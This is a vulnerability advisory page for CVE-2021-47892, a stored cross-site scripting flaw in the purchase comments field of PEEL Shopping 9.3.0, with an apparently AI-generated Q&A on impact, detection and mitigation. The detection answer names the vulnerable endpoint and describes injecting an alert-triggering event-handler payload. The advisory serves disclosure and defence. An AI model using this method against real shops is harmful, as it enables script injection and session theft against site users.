CVE-2021-47892
Stored XSS in PEEL Shopping 9.3.0 Purchase Comments Allows Script Execution
Publication date: 2026-01-23
Last updated on: 2026-01-23
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| peel | shopping | 9.3.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2021-47892 is a stored cross-site scripting (XSS) vulnerability in PEEL Shopping version 9.3.0. It exists in the 'Comments / Special Instructions' parameter on the purchase page, where attackers can inject malicious JavaScript code. This code is stored on the server and executed whenever the affected page is refreshed, allowing client-side script execution. [1, 2]
How can this vulnerability impact me? :
This vulnerability can allow attackers to execute malicious JavaScript in the context of the affected website. This can lead to theft of user credentials, session hijacking, defacement, or other malicious actions performed on behalf of the user. Since the malicious script executes when the page is refreshed, it can repeatedly affect users visiting the page. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to inject a JavaScript payload into the 'Comments / Special Instructions' field on the purchase page located at `/achat/achat_maintenant.php`. For example, you can submit a payload with an event handler such as `onload` or `onclick` that triggers an alert box. After submitting, refresh the page to see if the JavaScript executes, confirming the presence of the stored XSS vulnerability. Specific commands depend on your testing environment, but a common approach is to use curl or a browser-based tool to POST data to the purchase page with the malicious payload in the comments field and then check the page response for script execution. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include sanitizing and validating all user inputs on the 'Comments / Special Instructions' field to prevent injection of malicious scripts. Implement proper output encoding to neutralize any injected scripts before rendering them on the page. Additionally, consider applying web application firewall (WAF) rules to detect and block suspicious input patterns. If possible, update or patch PEEL Shopping to a version where this vulnerability is fixed. Until a patch is available, restrict user input or disable the vulnerable input field to prevent exploitation. [2]